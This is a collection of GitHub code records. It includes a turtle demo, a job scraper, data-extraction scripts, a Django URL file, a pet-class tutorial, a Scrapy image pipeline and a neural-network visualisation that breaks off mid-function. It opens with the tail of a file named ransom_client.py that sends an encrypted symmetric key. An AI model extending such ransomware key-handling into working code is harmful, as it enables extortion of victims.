decryptedSymmetricKey)\n\n\nsendEncryptedKey(\"./keys/encryptedSymmertricKey.key\")\nquit()\n","repo_name":"LemonSauc3/A1","sub_path":"ransom_client.py","file_name":"ransom_client.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25669662633","text":"import turtle as tr\r\ntr.shape('turtle')\r\nfrom random import *\r\ntr.speed(0)\r\n\r\ndef sluchaino():\r\n while True:\r\n tr.forward(randint(1, 30))\r\n a = random()\r\n if a >= 0.5:\r\n tr.right(randint(30, 360))\r\n else:\r\n tr.left(randint(30, 360))\r\n\r\n\r\nsluchaino()\r\ntr.exitonclick() ","repo_name":"petersNikolA/turtle2","sub_path":"turtle2,1.py","file_name":"turtle2,1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37909418182","text":"from bs4 import BeautifulSoup\nimport urllib.request as urllib2\nfor offset in range(0, 10, 10):\n redditFile = urllib2.urlopen(\n \"https://www.indeed.com/jobs?q=sql&l=United+States&sort=date&radius=25&start=\"+str(offset))\n redditHtml = redditFile.read()\n redditFile.close()\n\n soup = BeautifulSoup(redditHtml, 'html.parser')\n # print(soup)\n jobs = soup.find_all(\"div\", {\"class\": \"jobsearch-SerpJobCard\"})\n\n # print(jobs)\n\n #Title = soup.find_all(\"a\", {\"class\": \"jobtitle turnstileLink\",\"data-tn-element\": \"jobTitle\"})\n #Company = soup.find_all(\"a\", {\"data-tn-element\": \"companyName\"})\n for job in jobs:\n try:\n key = ['title', 'company', 'star', 'date']\n value = [job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"a\", {\"data-tn-element\": \"companyName\"}).text.strip(), 
job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip()]\n # Create a zip object from two lists\n dicobj = zip(key, value)\n # Create a dictionary from zip object\n dictOfWords = dict(dicobj)\n print(dictOfWords)\n except:\n try:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n except:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n","repo_name":"SudharsanaViswanathan/python","sub_path":"WebScrapingIndeedJobs/test_scripts/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22553262662","text":"import os, sys\nimport pandas as pd\nimport shutil\nfrom tqdm import tqdm\n\n# 파일에 원하는 정보를 데이터프레임으로 만들기\ndef make_df(dir):\n file_info = []\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.jpg':\n file_path = os.path.join(root, file)\n filename_split = filename.split('_')\n category = '_'.join(filename_split[:4])\n file_idx = int(filename_split[-1])\n file_info.append([file_path, category, file_idx])\n df = pd.DataFrame(file_info, columns=['filepath', 'category', 'num'])\n\n return df\n\n# 조건에 맞는 파일 추출\ndef file_extract(df, old_df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n old_df = old_df[old_df['category'] == Category]\n\n for i in range(minidx, maxidx, 3):\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n extract_num1 = extract_num + 10\n extract_num2 = extract_num + 20\n # copyfile(df, extract_num)\n old_file = old_df.loc[old_df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n copyfile(df, extract_num1)\n copyfile(df, extract_num2)\n\n\n# 파일 복사\ndef copyfile(df, num):\n extract_file = df.loc[df['num'] == num, 'filepath']\n extract_file = extract_file.values[0]\n root, file = os.path.split(extract_file)\n folder_name = '_'.join(file.split('_')[:3])\n folder = os.path.join(output_dir, 'new_db', folder_name)\n output_path = os.path.join(folder, file)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(extract_file, output_path)\n\n \ndef old_file_extract(df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n for i in range(minidx, maxidx, 3):\n old_file = df.loc[df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n old_file = old_file.values[0]\n root, file = os.path.split(old_file)\n folder_name = '_'.join(file.split('_')[:3])\n filename = '_'.join(file.split('_')[:4])\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n num = str(extract_num).zfill(8)\n frame_filename = f'{filename}_{num}.jpg'\n folder = os.path.join(output_dir, 'old_db', folder_name)\n output_path = os.path.join(folder, frame_filename)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(old_file, output_path)\n \n_, old_db_dir, new_db_dir, output_dir, mode_num = sys.argv\n\nold_db_df 
= make_df(old_db_dir)\nnew_db_df = make_df(new_db_dir)\n\ncategory_list = old_db_df['category'].unique()\n\n# 맨 앞 프레임을 무조건 살리는 경우\nif mode_num == '0':\n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n \n# 맨 앞 프레임에 조건을 넣을 경우\nelif mode_num == '1': \n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n min_idx = min_idx + 2\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n min_idx = min_idx + 1\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)","repo_name":"tkdalsrb123/Alchera","sub_path":"08/0801_frame_match_extract/frame_match_extract.py","file_name":"frame_match_extract.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11423635038","text":"import numpy as np\nimport pandas as pd\nimport yfinance as yf\nimport json as js\n\n# Function to pull option information of a stock\ndef option_pull(sym):\n ticker = yf.Ticker(sym)\n list_of_expirations = ticker.options\n\n # dataframe for options\n options = pd.DataFrame()\n\n for entry in list_of_expirations:\n curr_option = ticker.option_chain(entry)\n aggr_option = pd.DataFrame().append(curr_option.calls).append(curr_option.puts)\n aggr_option['expirationDate'] = entry\n options = options.append(aggr_option, ignore_index=True)\n\n return options\n\nprint (option_pull(\"AMD\"))\n\n\n\n\n\n","repo_name":"Anthony3301/Options-Evalutation-Tool","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12599076265","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n # 商品购买\n url(r'^product/$', views.product, name=\"product\"),\n url(r'^add/$',views.add,name=\"add\"),\n url(r'^findTypeByPID/$',views.findTypeByPID,name=\"findTypeByPID\"),\n # 购买\n url(r'(?P\\d+)/product/$', views.product, name=\"product\"),\n # 评论\n url(r'(?P\\d+)/pinglun/$', views.pinglun, name=\"pinglun\"),\n # 详情\n url(r'(?P\\d+)/xiangqing/$', views.xiangqing, name=\"xiangqing\"),\n # 分类\n url(r'(?P\\d+)/fenlei/$', views.fenlei, name=\"fenlei\"),\n]","repo_name":"0912TAO/mall1","sub_path":"goods/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34641998815","text":"class Person:\n def __init__(self, name, money, mood, healthRate):\n self.name = name\n self.money = money\n self.mood = mood\n self.healthRate = healthRate\n\n def eat(self, meals):\n meals = int(meals)\n if meals == 3:\n return \"100% hth\"\n elif meals == 2:\n return \"75% hth\"\n elif meals == 1:\n return \"50% hth\"\n elif meals == 0:\n return \"0% hth\"\n elif meals > 3:\n return \"fat\"\n else:\n return \"wrong input\"\n\n def sleep(self, hours):\n hours = int(hours)\n if hours == 7:\n return \"Happy\"\n elif hours < 7:\n return \"tired\"\n else:\n return \"Lazy\"\n\n def buy(self, items):\n items = int(items)\n self.money += items * 10\n return self.money\n\n @property # print property value\n def healthRate(self):\n return self.__healthRate\n\n @healthRate.setter\n def healthRate(self, helth):\n if helth >= 0 and helth <= 100:\n self.__healthRate = helth\n else:\n print(\"must be between 0 to 100.\")\n","repo_name":"minaemad13/Python_ITI_Lab4","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15954356355","text":"#\"我的魔幻宠物\"\n#目的:通过编程创建和自己互动的虚拟宠物,学习类的一些基本概念和用法\n'''现在请发挥你的想象力,把自己想象成一位宠物店的小魔法师,\n 现在你的工作是创造一些讨客人喜欢的魔幻宠物\n 可以是 传说中美丽的独角兽,那一定会让没见过独角兽的客人大吃一惊\n 但在这之前,我们需要学习一些魔法咒语(代码)\n'''\n#1.定义类\n'''首先,包括独角兽在内的所有魔幻宠物都需要先有个模型\n ,然后才能在这个模型的基础上去发挥想象力补充这个模型的具体细节\n 所以这个模型的创建,即类的定义,是十分很重要的\n 在这个过程中,我们需要使用第一条咒语\"class\",然后加上这个类的名称'''\nclass MyMagicPet:\n #2.定义属性\n '''\n 在类的下面给出魔幻宠物的基本属性:可以思考一下你要创建的一大群的宠物\n 会有的共同的特点,都会有名字,年龄等等,这里的答案很多,可以按照你的喜好\n 把它补充得更完整\n '''\n name = \"\"#名字\n age = 0#年龄\n gender = \"\"#性别\n color = \"\"#颜色\n #3.定义方法\n '''\n 接下来我们可以用”函数咒语“来实现我们想要对宠物进行的操作\n 比如选择他们的属性(例如:给他们取名,决定他们的性别),\n 还可以给它们喂食,跟他们玩耍等等'''\n def __init__(self, name, age, gender, color):\n '''\n 这个函数咒语可帮助我们定义一些创造出来的小动物可以改变的属性\n 这个过程也称为初始化(要记得写self)\n '''\n self.name = name\n self.age = age\n self.gender = gender\n self.color = color\n self.physicalCondition = \"健康的\"\n self.mentalCondition = \"快乐的\"\n self.degree = 0\n self.container = 0\n def show_info(self):\n print(f\"{self.name}的年龄是{self.age}岁,性别是{self.gender},颜色是{self.color}\")\n print(f\"状态是{self.physicalCondition}和{self.mentalCondition},等级是{self.degree}\")\n def feed_pet(self):\n '''\n 这是一个喂宠物的函数咒语,\n 根据宠物的健康状态进行不同的操作,\n 喂食成功会改变宠物的状态并升级宠物,\n 喂食失败则输出失败信息\n '''\n if self.physicalCondition == \"健康的\":\n print(\"喂食成功,你的宠物打了一个很响的饱嗝\")\n self.physicalCondition = \"饱食的\"\n self.upgrade_pet()\n elif self.physicalCondition == \"饥饿的\":\n print(\"喂食成功,你的宠物蹭着你的腿表示感谢\")\n self.physicalCondition = \"健康的\"\n self.upgrade_pet()\n else:\n print(\"喂食失败\")\n print(f\"{self.name}现在状态是{self.physicalCondition}\")\n print(\"无法继续获取经验,需要玩耍\")\n if self.mentalCondition == \"疲劳的\":\n self.mentalCondition = 
\"快乐的\"\n print(f\"{self.name}现在状态是{self.physicalCondition}和{self.mentalCondition}\")\n def play_with_pet(self):\n '''\n 这个函数咒语根据宠物的身心状态决定是否可以和宠物玩耍,\n 并根据结果更新宠物的状态信息。\n\n '''\n if self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"快乐的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"兴奋的\"\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n self.upgrade_pet()\n elif self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"兴奋的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"疲劳的\"\n self.physicalCondition = \"饥饿的\"\n self.upgrade_pet()\n else:\n print(\"跟他们玩耍失败\")\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n print(\"无法继续获取经验,需要喂食\")\n print(f\"{self.name}现在的状态是{self.physicalCondition}和{self.mentalCondition}\")\n def roll_over(self):\n '''这是一个简单的让宠物执行翻滚动作的函数咒语'''\n if self.degree >= 2:\n print(\"宠物翻滚成功\")\n self.upgrade_pet()\n else:\n print(\"宠物翻滚失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到2级才能翻滚\")\n def upgrade_pet(self):\n '''这个函数咒语可就厉害了,它能实现我们在游戏中经常看到的角色升级功能\n 那它的操作思路是怎么样的呢\n 1,首先,得用到上面初始化的存储经验的容器self.container\n 在执行一次可以加经验的行为的时候,容器里的经验值加1,\n 2.然后我们给这个容器一个上限:5\n 然后用if咒语来判断容器在加经验后是否满了\n 要是满了,就升一级,同时把容器里的经验清零,\n 然后就能实现这个升级功能啦'''\n self.container = self.container + 1\n print(f\"宠物{self.name}经验值加一,离升下一级还差{5 - self.container}点经验值\")\n if self.container == 5:\n self.degree = self.degree + 1\n print(f\"恭喜你的宠物{self.name}成功升到{self.degree}级\")\n self.container = 0\n\n'''\n class咒语还有另一种作用,叫做\"继承\",就是传承基本的宠物类的各种属性及方法(也就是函数)\n 在继承的过程中,你也可以根据你所希望对宠物进行的操作来进行属性和方法的修改或增加'''\n\nclass Dragon(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n #子类继承上面的父类,当然可以继承父类的属性和方法,当我们在调用时,还需用到另一条咒语:super()\n #在子类的基础上,我们可以添加一些独特的属性和方法\n self.size = \"大型\"\n self.strength = \"强大\"\n self.speed = \"飞快\"\n self.tech = tech\n def magic_transform(self):\n #这是一个简单的用来换技能的函数咒语,它会根据宠物的等级来判断是否可以进行技能转换\n if self.tech == \"技能1\":\n if self.degree <= 4:\n print(\"技能转换失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到5级才能转换\")\n else:\n print(\"技能转换成功\")\n self.tech = \"技能2\"\n print(\"技能转换成功\")\n elif self.tech == \"技能2\":\n self.tech = \"技能1\"\n print(\"技能转换成功\")\n def use_tech(self):\n #当然,既然我们创建的是魔幻宠物,那就得有些其他的的普通宠物没有的特点,\n # 比如,它可以用技能,这是一个用来使用技能的函数咒语,在里边判断宠物所持有的技能\n # 然后根据技能的效果来进行相应的操作\n if self.tech == \"技能1\":\n print(\"技能1使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前喷射了一小团小小的火焰,\")\n else:\n print(f\"你的宠物{self.name}向前喷射了一团巨大的火焰\")\n self.physicalCondition = \"饥饿的\"\n self.mentalCondition = \"疲劳的\"\n self.upgrade_pet()\n elif self.tech == \"技能2\":\n print(\"技能2使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前刮起了一阵人畜无害的微风\")\n self.upgrade_pet()\n else:\n print(f\"你的宠物{self.name}将会向前刮起一阵毁灭性的龙卷风\")\n choice = input(\"你要继续使用技能吗?(y/n)\")\n if choice == \"y\":\n print(f\"你的宠物{self.name}向前刮起了一阵毁灭性的龙卷风\")\n print(\"很好,在一流魔法师店长的及时的救助下,魔法宠物店有幸没有化为废墟\")\n print(\"所谓大难不死必有后福,在使用了这一强力技能后,你的宠物获得了大量经验\")\n for i in range(10):\n self.upgrade_pet()\n print(f\"现在你的宠物{self.name}的等级是{self.degree}\")\n elif choice == \"n\":\n print(\"你选择了不使用技能\")\n else:\n print(\"你输入了错误的选项,请在“n,y”中选一\")\n\n def show_func(self):\n print(\"我是一个大型的火焰龙,我有着强大的力量,我飞快地移动\")\n print(f\"现在我能使用的技能是{self.tech}\")\nclass Unicorn(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n self.size = \"中型\"\n self.strength = \"壮实\"\n self.speed = \"飞速\"\n self.tech = tech\n def 
show_func(self):\n print(\"我是一个中型的独角兽,我有着强大的力量,我飞速地移动\")\n\n#在完成上述的类的定义和继承后,我们就做足施展魔法的准备了,下面请尽情施展魔法吧!\n#比如创建一个Dragon类的对象怎么样?\n\n#比如对它进行操作怎么样?\n\n#比如对它进行升级怎么样?\n\n#再比如,做些更厉害的事,去发挥想象力去补充下独角兽类?\n\n#勇敢地去试试吧!\n\n","repo_name":"hzt200306/pythonProjectsDevelopment","sub_path":"python/06_lzt_MyMagicPet/魔法宠物程序制作.py","file_name":"魔法宠物程序制作.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10603534739","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass MzituPipeline(ImagesPipeline):\n def file_path(self, request, response=None, info=None):\n item = request.meta['item']\n folder = item['name']\n folder_strip = strip(folder)\n image_guid = request.url.split('/')[-1]\n filename = u'{0}/{1}'.format(folder_strip, image_guid) # 路径 只是生成路径\n return filename\n\n\n # 固定写法 多加一个referer 保存图片\n def get_media_requests(self, item, info):\n for img_url in item['image_urls']:\n referer = item['url']\n yield scrapy.Request(img_url, meta={'item': item,\n 'referer': referer})\n\n def item_completed(self, results, item, info):\n image_paths = [x['path'] for ok, x in results if ok]\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n return item\n\n\ndef strip(path):\n path = re.sub(r'[?\\\\*|“<>:/]', '', str(path))\n return path\n\n\nif __name__ == \"__main__\":\n a = '我是一个?\\*|“<>:/错误的字符串'\n print(strip(a))","repo_name":"pol9111/mzitu","sub_path":"mzitu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18689610220","text":"import os, sys\nimport zipfile\n\ndef statlog(s):\n print(\" -- %s\" % s)\n \nclass JAJFile:\n def __init__(self, jaj_filepath):\n if not zipfile.is_zipfile(jaj_filepath):\n raise Exception(\"I need a zipfile\")\n \n self.filepath = jaj_filepath\n self.filename = os.path.split(jaj_filepath)[0]\n self.zf = zipfile.ZipFile(jaj_filepath, 'r')\n\n self.background_pdf_filename = None\n self.background_pdf_filepath = None\n self.dc_svg_annotation = {}\n self.ls_extract = []\n self.dir_tmp = None\n\n for info in self.zf.infolist():\n if info.filename.startswith(\"background\") and info.filename.endswith(\".pdf\"):\n self.background_pdf_filename = info.filename\n self.ls_extract.append(info.filename)\n # jarnal annotations have format \"p%d.svg\" and start from 0\n if info.filename.startswith('p') and info.filename.endswith('.svg'):\n svg_page_num = int(os.path.splitext(info.filename[1:])[0])\n # cache the svgs in the annotation directory\n self.dc_svg_annotation[svg_page_num] = info.filename\n self.ls_extract.append(info.filename)\n \n if self.background_pdf_filename is None:\n raise Exception(\"did not did not find any pdfs in the jaj\")\n \n def extract_to_directory(self, output_directory):\n if not os.path.exists(output_directory):\n os.mkdir(output_directory)\n self.dir_tmp = output_directory\n for filename in self.ls_extract:\n extract_path = os.path.join(output_directory, filename)\n open(extract_path, 'wb').write(self.zf.read(filename))\n #statlog('extracted %s' % filename)\n\n self.background_pdf_filepath = os.path.join(output_directory, 
self.background_pdf_filename)\n \n def cleanup(self):\n if not self.dir_tmp: return\n for filename in self.ls_extract:\n print(\"~ jaj %s\" % filename)\n os.unlink(os.path.join(self.dir_tmp, filename))\n os.rmdir(self.dir_tmp)\n \n # old stuff from another class that did something similar, possibly\n # redundant. shoehorned to fit here, may not work\n def deflate(self):\n if not self.dir_tmp:\n self.dir_tmp = \"%s.dir\" % self.filename\n CWD = os.getcwd()\n os.mkdir(self.dir_tmp)\n os.chdir(self.dir_tmp)\n \n # extract into dir_tmp\n for info in self.zf.infolist():\n with open(info.filename, \"w\") as ofile:\n ofile.write(self.zf.read(info.filename))\n\n os.chdir(CWD)\n \n def inflate(self, remove_temp = True):\n if not self.dir_tmp:\n self.deflate()\n\n CWD = os.getcwd()\n os.chdir(self.dir_tmp)\n\n ls_archive_file = os.listdir('.')\n print(\"creating archive...\")\n zofile = zipfile.ZipFile(self.filename, mode='w')\n try:\n for filename in ls_archive_file:\n zofile.write(filename)\n finally:\n print(\"archive successfully created\")\n zofile.close()\n\n os.chdir(CWD)\n \n if remove_temp:\n os.rename(os.path.join(self.dir_tmp, self.filename), os.path.join(CWD, self.filename))\n shutil.rmtree(self.dir_tmp)\n self.dir_tmp = None\n \n\n","repo_name":"whacked/BeanBunny","sub_path":"BeanBunny/io/JarnalFile.py","file_name":"JarnalFile.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70732230567","text":"# simple neuron using complex numbers for weights and input\n# to learn the XOR problem, must use 2 periods, ie, dividing the circle into 2 sections so opposite angles have the same category\n# The ideas are based from the link below, which I modified based on my understanding of how the neuron behaves\n# I've extended this to include visualization of the neural activity\n# https://github.com/makeyourownneuralnetwork/complex_valued_neuralnetwork/blob/master/single_neuron-periodic.ipynb\n# http://makeyourownneuralnetwork.blogspot.com/2016/05/complex-valued-neural-networks.html\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport math\nimport copy\n\n# initialize visualization\nfig, ax = plt.subplots(figsize=(8, 5), subplot_kw=dict(aspect=\"equal\", adjustable='datalim', anchor='C'))\n# ax.set_xlim((-4,4))\n# ax.set_ylim((-4,4))\nfig.set_dpi(100)\nclass ComplexNeuron():\n def __init__(self, inputn, cat, periods):\n self.input_num = inputn\n self.categories = cat\n self.periods = periods\n self.tc_passed = 0\n\n # link weights matrix\n self.w = np.random.normal(0.0, 1.0, (inputn + 1))\n self.w = np.array(self.w, ndmin=2, dtype='complex128')\n self.w += 1j * np.random.normal(0.0, 1.0, (inputn + 1))\n print ('Weights: ', self.w)\n self.out = {}\n self.map_out()\n print ('Out Mapping: ',self.out)\n\n def map_out(self):\n sections = self.categories * self.periods\n angle = 2 * np.pi / sections\n h_angle = angle / 2\n # angle + π to get the oposite angle\n for i in range(1, self.categories+1):\n out_dict = {}\n o_angle = angle * i\n t_angle = o_angle - h_angle\n\n out_dict['angle'] = [o_angle]\n out_dict['target'] = [t_angle]\n if self.periods == 2:\n for j in range(1, self.periods):\n out_dict['angle'].append(o_angle + np.pi)\n out_dict['target'].append(t_angle + np.pi)\n\n self.out[i-1] = out_dict\n self.out[i-1] = out_dict\n\n # create Pie to represent neuron\n data = np.ones(4)\n labels = ['False', 'True'] * 2\n patches, texts, autotexts = 
ax.pie(data, autopct=lambda pct: int(pct * sum(data)/100), \n labels=labels, textprops=dict(color=\"w\"))\n \n # set Pie legends Title and loc\n ax.legend(patches, labels,\n title=\"Truth Values\",\n loc=\"center left\",\n bbox_to_anchor=(0.8, 0, 0.5, 1))\n\n # Set Legends color and Texts\n legnds = ax.get_legend()\n for i in range(sections):\n patches[i-1].set_alpha(0.7)\n if i%2 == 0:\n autotexts[i].set_text('0')\n patches[i].set_color('#0cff0c')\n legnds.legendHandles[i].set_color('#0cff0c')\n else:\n patches[i].set_color('#0165fc')\n legnds.legendHandles[i].set_color('#0165fc')\n\n ax.set_title(\"Single Neuron:\\nSolving XOR Problem\")\n plt.setp(autotexts, size=8, weight=\"bold\")\n \n def map_z(self, z):\n z = np.angle(z)\n while z < 0:\n z += 2 * np.pi\n\n print ('Angle: ', z)\n for i in range(self.periods):\n for j in range(self.categories):\n if z < self.out[j]['angle'][i]:\n return j, i\n\n def query(self, in_list, visual=False):\n print ('++++++++++++++++ Q U E R Y ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n return z, (o, q)\n \n def train(self, in_list, target, visual=False):\n print ('++++++++++++++++ T R A I N ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n # if o == target:\n # self.tc_passed += 1\n # return z\n\n print ('Modify weights!')\n t_angle = np.array(self.out[target]['target'])\n print ('Target Angles: ', t_angle)\n #t_angle_2complex = complex(np.cos(t_angle) + 1j*np.sin(t_angle))\n\n errors = np.exp(1j * t_angle) - z\n #print ('Errors: ', errors)\n e = errors[np.argmin(np.abs(errors))]\n print ('Error: ', e)\n dw = e * input / 3\n self.w += dw\n print ('Weights: ',self.w)\n \n #query after weight adjustment\n # z1, _ = self.query(in_list[:2])\n # o1, _ = self.map_z(z1)\n # if o1 == target:\n # self.tc_passed += 1\n \n return z, (o, q)\n \n def reset_tc_passed(self):\n self.tc_passed = 0\n\ndef visualize(angle, q, offset=1):\n x = np.cos(angle)\n y = np.sin(angle)\n #ax.scatter(x,y, facecolor='red')\n # xtxt = -1.7\n # ytxt = 1.2 * offset\n xtxt = 0\n ytxt = 0\n offset *= 0.25\n if q[1] == 1: # bottom half of circle\n ytxt = y - offset\n if q[0] == 0:\n xtxt = x - offset\n else:\n xtxt = x + offset\n else: # top half of circle\n ytxt = y + offset\n if q[0] == 1:\n xtxt = x - (offset + 0.25)\n else:\n xtxt = x + offset\n return (x,y), (xtxt, ytxt)\n\n# Initialize neural network\nn_in = 2\ncat = 2\nper = 2\nnn = ComplexNeuron(n_in, cat, per)\n\n# define arrow annotations for raw and learned angle\narrowprops = dict(arrowstyle=\"-|>\",\n color='black',\n shrinkA=5, shrinkB=5,\n patchA=None,\n patchB=None,\n connectionstyle=\"angle,angleA=-90,angleB=180,rad=5\",\n )\nraw_angle = plt.annotate('', xy=(0,0))\nlearned_angle = plt.annotate('', xy=(0,0))\n\n# define Input Texts and Input Data\nbbox = dict(boxstyle=\"square\", fc='w', ec='black')\ntxt_handler = [\n plt.text(-2, 0.6, \"Training Data:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, 0.35, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-1.8, 0, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-2, -0.4, \"Target Output:\", 
weight=\"semibold\", size='large'),\n plt.text(-1.8, -0.65, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace')]\n\nTrain_d = [\n ['Train',[-1, -1], 0],\n ['Train',[-1, 1], 1],\n ['Train',[ 1, -1], 1],\n ['Train',[ 1, 1], 0],\n ['Query',[-1, -1]],\n ['Query',[-1, 1]],\n ['Query',[ 1, -1]],\n ['Query',[ 1, 1]]\n]\ncnt = 0\nt_len = len(Train_d)\ntest = False\nlearned_point, = ax.plot([], [], 'ro')\nraw_point, = ax.plot([], [], 'ro')\ndef updatefig(data):\n global txt_handler, nn, Train_d, cnt, t_len, raw_angle, learned_angle, test, arrowprops, learned_point, raw_point\n bbox = dict(boxstyle=\"square\", fc='w', ec='black')\n bbox_r = dict(boxstyle=\"square\", fc='red', ec='black')\n bbox_g = dict(boxstyle=\"square\", fc='green', ec='black')\n\n if Train_d[cnt][0] == 'Train':\n if test:\n print ('Data: ', Train_d[cnt][1])\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set and show learned angle and point\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n test = False\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n\n return [*txt_handler, learned_angle , raw_angle, learned_point, raw_point]\n else:\n z, q = nn.train(Train_d[cnt][1], Train_d[cnt][2])\n xy, xytxt = visualize(np.angle(z), q, -1.2)\n # set raw angle and point\n raw_point.set_data(xy)\n raw_point.set_visible(True)\n raw_angle = plt.annotate('Raw Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gray'), arrowprops=arrowprops)\n \n # set input 